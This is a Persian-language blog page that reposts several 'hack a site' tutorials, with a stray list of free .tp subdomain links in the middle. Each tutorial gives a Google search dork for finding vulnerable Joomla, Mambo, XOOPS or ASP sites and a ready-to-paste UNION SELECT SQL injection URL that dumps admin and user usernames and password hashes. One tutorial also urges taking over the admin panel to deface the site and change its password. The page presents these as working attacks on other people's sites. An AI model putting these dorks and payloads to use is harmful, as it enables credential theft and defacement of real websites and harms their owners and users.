سیستم وبلاگ پارسی باکسسیستم مدیریت فروش هاست و دامینسایت شخصی محسن داوری برنامه نویس PHPهماهنگی با موتورهای جستجو , رنکینگ گوگل , google pagerank , page rank , seo , search

امروز براتون به آموزش جالب از سری آموزش های هک سایت به وسیله باگ های منتشر شده رو  گذاشتم!

این آموزش از این قرار است که شما می توانید از طریق آسیپ پذیری موجو در سایت های که دارای مدیریت محتوای (com_clasifier) هستند به هک پسورد ادمین این قبیل سایت ها بپردازید!

خوب شما برای هک این سایت ها ابتدا عبارت زیر را در گوگل جستجو کنید:

com_clasifier

یا

com_clasifier cat_id

حال پس ار یافتن سایت های مورد نظر فقط کافی است که عبارت زیر را به ادامه نام سایت اضافه کنید:

index.php?option=com_clasifier&Itemid=S@BUN&cat_id=-9999999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/*

حال مشاهده خواهید کرد که پسورد های ادمین سایت را به صورت Encode شده در اختیار شما قرار داده می شود و شما می توانید به وسیله یک برنامه Encode پسورد های اصلی را به دست آورید!

امروز براتون به آموزش جالب از سری آموزش های هک سایت به وسیله باگ های منتشر شده رو  گذاشتم!

این آموزش از این قرار است که شما می توانید از طریق آسیپ پذیری موجو در سایت های که دارای مدیریت محتوای (com_portfolio) هستند به هک یوزر و پسورد کاربران این قبیل سایت ها بپردازید!

خوب شما برای هک این سایت ها ابتدا عبارت زیر را در گوگل جستجو کنید:

index.php?option=com_portfolio

حال پس ار یافتن سایت های مورد نظر فقط کافی است که عبارت زیر را به ادامه نام سایت اضافه کنید:

index.php?option=com_portfolio&memberId=9&categoryId=-1+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12+from+mos_users/*

حال مشاهده خواهید کرد که پسورد های کاربران سایت را به صورت Encode شده در اختیار شما قرار داده می شود و شما می توانید به وسیله یک برنامه Encode پسورد های اصلی را به دست آورید!

امروز می خوام تو این پست یه باگ خیلی جدید که یه دو سه روزی از انتشار اون تو اینترنت می گذره رو بهتون معرفی کنم که شما از طریق اون می تونید به آسونی آب خوردن پسورد ادمین سایت های (webboard question.asp) بدون اینکه اینکود شده باشد رو بیرون بیارید و اونو به نام خودتون هک کنید و حتی متن و عکس های دلخواه خودتون رو تو سایت با نام خودتون و تو صفحه اصلی سایت قرار یدین و حتی پسورد سایت را به صورت دلخواه تغییر دهید و به طور کلی بگم که می تونید در یک کلام قسمت مدیریت سایت رو هک کنید!

خوب شما برای هک این سایت ها ابتدا عبارت زیر را در گوگل جستجو کنید:

webboard question.asp QID

حال پس ار یافتن سایت های مورد نظر فقط کافی است که عبارت زیر را به ادامه نام سایت اضافه کنید:

question.asp?QID=-1122334455%20+%20union%20+%20select%20+%200,null,2,username,password,5,password,7,8,9,null%20+%20from%20+%20+%20administrator%20';';

حال مشاهده خواهید کرد که پسورد های ادمین سایت را بدون اینکه اینکود شده یاشه در اختیار شما قرار میده!

حال جهت ورود به قسمت مدیریت سایت با همون Adminstrator باید از طریق لینک زیر اقدام نمائید که به جای عبارت xxx نام سایت مورد نظر را قرار دهید.

به نقل از پسورد 35

http://www.Your-Name.us.tp

http://www.Your-Name.ca.tp

http://www.Your-Name.au.tp 

http://www.Your-Name.com.au.tp

http://www.Your-Name.uk.tp

http://www.Your-Name.co.uk.tp

http://www.Your-Name.me.uk.tp

http://www.Your-Name.org.uk.tp

http://www.Your-Name.fr.tp

http://www.Your-Name.de.tp

http://www.Your-Name.at.tp

http://www.Your-Name.co.at.tp

http://www.Your-Name.ch.tp

http://www.Your-Name.eu.tp

http://www.Your-Name.it.tp

http://www.Your-Name.nl.tp

http://www.Your-Name.dk.tp

http://www.Your-Name.no.tp

http://www.Your-Name.se.tp

http://www.Your-Name.es.tp

http://www.Your-Name.pt.tp

http://www.Your-Name.mx.tp

http://www.Your-Name.ar.tp

http://www.Your-Name.br.tp

http://www.Your-Name.cn.tp

http://www.Your-Name.jp.tp

http://www.Your-Name.kr.tp

http://www.Your-Name.ru.tp

http://www.Your-Name.pl.tp

http://www.Your-Name.co.sr

امروز براتون به آموزش جالب از سری آموزش های هک سایت به وسیله باگ های منتشر شده رو براتون گذاشتم!
این آموزش از این قرار است که شما می توانید از طریق آسیپ پذیری موجو در سایت های که دارای  مدیریت محتوای JOOMLA com_candle SQL Injection هستند به هک آنها بپردازید!

خوب شما برای هک این سایت ها ابتدا عبارت زیر را در گوگل جستجو کنید:

com_candle

حال پس ار یافتن سایت های مورد نظر فقط کافی است که عبارت زیر را به ادامه نام سایت اضافه کنید:

index.php?option=com_candle&task=content&cID=-9999/**/union/**/
select/**/0x3a,username,0x3a,password,0x3a,0x3a/**/from/**/jos_users/*

حال مشاهده خواهید کرد که یورز نیم و پسورد ادمین سایت مورد نظر را برای شما نمایش داده می شود که پسورد  در اختیار شما قرار داده می شود!

نقل قول از پسورد 35

امروز براتون به آموزش جالب از سری آموزش های هک سایت به وسیله باگ های منتشر شده رو براتون گذاشتم!
این آموزش از این قرار است که شما می توانید از طریق آسیپ پذیری موجو در سایت های که دارای  مدیریت محتوای module wfdownloads SQL Injection هستند به هک آنها بپردازید!

خوب شما برای هک این سایت ها ابتدا عبارت زیر را در گوگل جستجو کنید:

modules/wfdownloads/viewcat.php?cid

یا

modules/wfdownloads

حال پس ار یافتن سایت های مورد نظر فقط کافی است که عبارت زیر را به ادامه نام سایت اضافه کنید:

modules/wfdownloads/viewcat.php?cid=999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect+000,concat(uname,0x3a,pass)/**/from%2F%2A%2A%2Fxoops_users/*where%20pass

حال مشاهده خواهید کرد که یورز نیم و پسورد کاربران سایت مورد نظر را به صورت اینکود شده برای شما نمایش داده می شود که شما می توانید با باز کردن این پسورد از اینکود  پسورد سایت را به دست آورید!

نقل قول از پسورد 35

امروز براتون به آموزش جالب از سری آموزش های هک سایت به وسیله باگ های منتشر شده رو براتون گذاشتم!
این آموزش از این قرار است که شما می توانید از طریق آسیپ پذیری موجو در سایت های که دارای  مدیریت محتوای Classifieds listingid هستند به هک آنها بپردازید!

خوب شما برای هک این سایت ها ابتدا عبارت زیر را در گوگل جستجو کنید:

showad.php?listingid=

حال پس ار یافتن سایت های مورد نظر فقط کافی است که عبارت زیر را به ادامه نام سایت اضافه کنید:

showad.php?listingid=xCoRpiTx&cat=-99/**/union+select/**/concat(username,0x3a,email),password,2/**/from/**/users/*

حال مشاهده خواهید کرد که یورز نیم و پسورد اینکود شده سایت را در اختیار شما قرار داده می شود!

نقل قول از پسورد 35